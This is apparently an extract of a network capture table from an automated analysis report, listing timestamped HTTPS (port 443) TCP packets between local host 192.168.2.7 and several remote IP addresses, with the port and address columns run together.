                                                                                                                                                                        Nov 24, 2024 05:11:30.813226938 CET4434973213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.872112989 CET4434972613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.872253895 CET4434972613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.872308969 CET49726443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.872507095 CET49726443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.872524977 CET4434972613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.872538090 CET49726443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.872548103 CET4434972613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.875191927 CET49733443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.875240088 CET4434973313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.875345945 CET49733443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.875458002 CET49733443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.875475883 CET4434973313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.941973925 CET4434972713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.942039967 CET4434972713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.942131042 CET49727443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.942245960 CET49727443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.942245960 CET49727443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.942290068 CET4434972713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.942317963 CET4434972713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.944328070 CET49734443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.944351912 CET4434973413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.944442034 CET49734443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.944539070 CET49734443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.944550991 CET4434973413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:31.034004927 CET4434972813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:31.034147024 CET4434972813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:31.034373999 CET49728443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:31.034373999 CET49728443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:31.034373999 CET49728443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:31.036061049 CET49735443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:31.036154985 CET4434973513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:31.036262035 CET49735443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:31.036381006 CET49735443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:31.036422014 CET4434973513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:31.081789970 CET44349729104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:31.081912994 CET49729443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:31.083636999 CET49729443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:31.083666086 CET44349729104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:31.083962917 CET44349729104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:31.085659981 CET49729443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:31.085798979 CET49729443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:31.085813046 CET44349729104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:31.348918915 CET49728443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:31.348979950 CET4434972813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:31.785155058 CET44349729104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:31.785264015 CET44349729104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:31.785491943 CET49729443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:31.785795927 CET49729443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:31.785836935 CET44349729104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:32.451297998 CET443497304.175.87.197192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:32.451432943 CET49730443192.168.2.74.175.87.197
                                                                                                                                                                        Nov 24, 2024 05:11:32.454416990 CET49730443192.168.2.74.175.87.197
                                                                                                                                                                        Nov 24, 2024 05:11:32.454422951 CET443497304.175.87.197192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:32.454698086 CET443497304.175.87.197192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:32.460812092 CET49736443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:32.460894108 CET44349736104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:32.460992098 CET49736443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:32.461472034 CET49736443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:32.461512089 CET44349736104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:32.465825081 CET4434973113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:32.469290972 CET49731443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:32.469330072 CET4434973113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:32.469990969 CET49731443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:32.469999075 CET4434973113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:32.505171061 CET49730443192.168.2.74.175.87.197
                                                                                                                                                                        Nov 24, 2024 05:11:32.655936956 CET4434973313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:32.656702042 CET49733443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:32.656730890 CET4434973313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:32.657351971 CET49733443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:32.657357931 CET4434973313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:32.658226013 CET4434973413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:32.658370018 CET4434973213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:32.658590078 CET49734443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:32.658623934 CET4434973413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:32.658932924 CET49732443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:32.658946991 CET4434973213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:32.659080029 CET49734443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:32.659084082 CET4434973413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:32.659615993 CET49732443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:32.659620047 CET4434973213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:32.817409992 CET4434973513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:32.818629026 CET49735443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:32.818706036 CET4434973513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:32.819376945 CET49735443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:32.819391012 CET4434973513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:32.909900904 CET4434973113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:32.909982920 CET4434973113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:32.910170078 CET49731443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:32.910470963 CET49731443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:32.910499096 CET4434973113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:32.910516024 CET49731443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:32.910522938 CET4434973113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:32.914239883 CET49738443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:32.914288044 CET4434973813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:32.914388895 CET49738443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:32.914608955 CET49738443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:32.914627075 CET4434973813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.094192982 CET4434973413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.094260931 CET4434973413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.094532013 CET49734443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:33.094645023 CET49734443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:33.094662905 CET4434973413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.094691992 CET49734443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:33.094696999 CET4434973413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.098598957 CET49739443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:33.098644972 CET4434973913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.098722935 CET49739443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:33.098999977 CET49739443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:33.099014997 CET4434973913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.099369049 CET4434973313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.099452019 CET4434973313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.099562883 CET49733443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:33.099698067 CET49733443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:33.099741936 CET4434973313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.099778891 CET49733443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:33.099812984 CET4434973313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.102734089 CET49740443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:33.102773905 CET4434974013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.102830887 CET49740443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:33.103147030 CET49740443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:33.103161097 CET4434974013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.110708952 CET4434973213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.110784054 CET4434973213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.110934973 CET49732443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:33.110992908 CET49732443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:33.111000061 CET4434973213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.113869905 CET49741443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:33.113902092 CET4434974113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.114027023 CET49741443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:33.114181042 CET49741443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:33.114195108 CET4434974113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.260898113 CET4434973513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.261064053 CET4434973513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.261281967 CET49735443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:33.261486053 CET49735443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:33.261528015 CET4434973513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.261558056 CET49735443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:33.261573076 CET4434973513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.265021086 CET49742443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:33.265063047 CET4434974213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.265149117 CET49742443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:33.265333891 CET49742443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:33.265347004 CET4434974213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.767653942 CET44349736104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.767750978 CET49736443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:33.769093037 CET49736443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:33.769123077 CET44349736104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.769378901 CET44349736104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.771116018 CET49736443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:33.771892071 CET49736443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:33.771940947 CET44349736104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.772070885 CET49736443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:33.772119045 CET44349736104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.772238970 CET49736443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:33.772274971 CET44349736104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.772450924 CET49736443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:33.772500038 CET44349736104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.773230076 CET49736443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:33.773279905 CET44349736104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.773461103 CET49736443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:33.773500919 CET44349736104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.773519039 CET49736443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:33.773540974 CET44349736104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.773729086 CET49736443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:33.773766041 CET44349736104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.773809910 CET49736443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:33.773900032 CET49736443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:33.773937941 CET49736443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:33.815377951 CET44349736104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.815577030 CET49736443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:33.815654039 CET49736443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:33.815709114 CET49736443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:33.863338947 CET44349736104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.864939928 CET49736443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:33.907346964 CET44349736104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:33.969160080 CET49730443192.168.2.74.175.87.197
                                                                                                                                                                        Nov 24, 2024 05:11:34.015331984 CET443497304.175.87.197192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:34.570775986 CET443497304.175.87.197192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:34.570796967 CET443497304.175.87.197192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:34.570804119 CET443497304.175.87.197192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:34.570813894 CET443497304.175.87.197192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:34.570866108 CET443497304.175.87.197192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:34.570871115 CET49730443192.168.2.74.175.87.197
                                                                                                                                                                        Nov 24, 2024 05:11:34.570897102 CET443497304.175.87.197192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:34.570921898 CET49730443192.168.2.74.175.87.197
                                                                                                                                                                        Nov 24, 2024 05:11:34.570950985 CET49730443192.168.2.74.175.87.197
                                                                                                                                                                        Nov 24, 2024 05:11:34.570950985 CET49730443192.168.2.74.175.87.197
                                                                                                                                                                        Nov 24, 2024 05:11:34.592767000 CET443497304.175.87.197192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:34.592849016 CET443497304.175.87.197192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:34.592961073 CET49730443192.168.2.74.175.87.197
                                                                                                                                                                        Nov 24, 2024 05:11:34.593139887 CET49730443192.168.2.74.175.87.197
                                                                                                                                                                        Nov 24, 2024 05:11:34.763899088 CET4434973813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:34.816940069 CET49738443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:34.816962004 CET4434973813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:34.818303108 CET4434974013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:34.856820107 CET49738443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:34.856833935 CET4434973813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:34.864552975 CET49740443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:34.866858959 CET49740443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:34.866869926 CET4434974013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:34.867278099 CET49740443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:34.867283106 CET4434974013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:34.893548965 CET4434974113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:34.893989086 CET49741443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:34.894011021 CET4434974113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:34.898586035 CET49741443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:34.898593903 CET4434974113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:34.942857981 CET4434973913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:34.949390888 CET49739443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:34.949435949 CET4434973913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:34.949794054 CET49739443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:34.949805021 CET4434973913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:34.986998081 CET4434974213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.016515017 CET49742443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.016534090 CET4434974213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.030376911 CET49742443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.030383110 CET4434974213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.216722012 CET4434973813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.216877937 CET4434973813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.216942072 CET49738443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.217578888 CET49738443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.217578888 CET49738443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.217597008 CET4434973813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.217607021 CET4434973813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.252445936 CET4434974013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.252535105 CET4434974013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.252625942 CET49740443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.264367104 CET49740443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.264389992 CET4434974013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.264403105 CET49740443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.264409065 CET4434974013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.322649956 CET49746443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.322704077 CET4434974613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.322813988 CET49746443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.336735010 CET4434974113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.336796999 CET4434974113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.336891890 CET49741443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.360040903 CET49746443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.360059977 CET4434974613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.367208958 CET49741443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.367228031 CET4434974113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.367242098 CET49741443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.367247105 CET4434974113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.370193958 CET49747443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.370229959 CET4434974713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.370479107 CET49747443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.370642900 CET49747443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.370651960 CET4434974713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.373174906 CET49748443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.373195887 CET4434974813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.373259068 CET49748443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.374356031 CET49748443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.374370098 CET4434974813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.395800114 CET4434973913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.395864010 CET4434973913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.395956039 CET49739443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.398593903 CET49739443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.398593903 CET49739443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.398612022 CET4434973913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.398622036 CET4434973913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.413939953 CET49749443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.413973093 CET4434974913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.414057016 CET49749443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.414544106 CET49749443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.414556026 CET4434974913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.421140909 CET4434974213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.421235085 CET4434974213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.421310902 CET49742443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.425779104 CET49742443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.425790071 CET4434974213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.425798893 CET49742443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.425802946 CET4434974213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.445580006 CET49750443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.445625067 CET4434975013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.445696115 CET49750443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.446960926 CET49750443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:35.446975946 CET4434975013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.952867985 CET49730443192.168.2.74.175.87.197
                                                                                                                                                                        Nov 24, 2024 05:11:35.952867985 CET49730443192.168.2.74.175.87.197
                                                                                                                                                                        Nov 24, 2024 05:11:35.952893972 CET443497304.175.87.197192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:35.952905893 CET443497304.175.87.197192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:36.084202051 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                        Nov 24, 2024 05:11:37.087855101 CET4434974813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.089466095 CET49748443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.089483976 CET4434974813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.091377974 CET49748443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.091386080 CET4434974813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.127140045 CET4434974913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.128005981 CET49749443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.128032923 CET4434974913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.128485918 CET49749443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.128490925 CET4434974913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.151369095 CET4434974713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:37.151916027 CET49747443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:37.151932001 CET4434974713.107.246.63192.168.2.7
